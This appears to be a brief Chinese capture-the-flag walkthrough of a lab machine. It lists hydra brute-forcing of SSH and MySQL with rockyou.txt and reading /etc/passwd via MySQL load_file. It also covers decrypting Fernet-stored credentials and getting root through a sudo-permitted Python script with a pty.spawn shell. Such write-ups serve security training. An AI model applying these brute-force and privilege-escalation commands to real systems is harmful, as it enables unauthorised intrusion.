1.常规端口及服务发现
2.没有开放web服务,但是开启了22端口的ssh服务以及mysql的3306端口
3.searchsploit搜索mysql版本拷贝下来但是没有得到结果
开始用hydra来尝试进行ssh爆破
hydra -l root -P rockyou.txt ssh://10.1.8.128:1337
破解失败,使用hydra对mysql进行爆破
hydra -l root -P rockyou.txt mysql://10.1.8.128
破解成功得到密码prettywoman
4.mysql尝试进行登录
mysql -u root -h 10.1.8.128 -p 输入密码连接成功
尝试使用! bash失败
select do_system(‘id’) 但是不存在这个函数
执行语句 select load_file(‘/etc/passwd’)发现一个名为lcuy的账号
尝试查看其他可以存在有效信息系统文件路径文件,查看lucy下的公钥文件也不存在
5.查看mysql数据库的表与数据,表名为fernet,是一种python下的加密算法
继续查看字段名里面存在一段密文和key,运行加密算法进行解密
from cryptography.fernet import Fernet
key = b’…’
f = Fernet(key)
token =b’…’
f.decrypt(token)
解密得到b’lucy:wj9`"Lemdv9[FEw-’
6.ssh登录lucy账号成功进入账号
uname -a内核版本提权失败
查看.bash_hsitory发现执行过/opt/exp.py
sudo -l 查看到exp这个py文件存在root权限文件
查看exp源码文件发现raw_input函数可以动态执行名
所以可以进行命令执行
放入以前用的提权语句
python -c ‘import pty;pty.spawn(“/bin/bash”)’
7.提权成功拿下root权限,打靶完成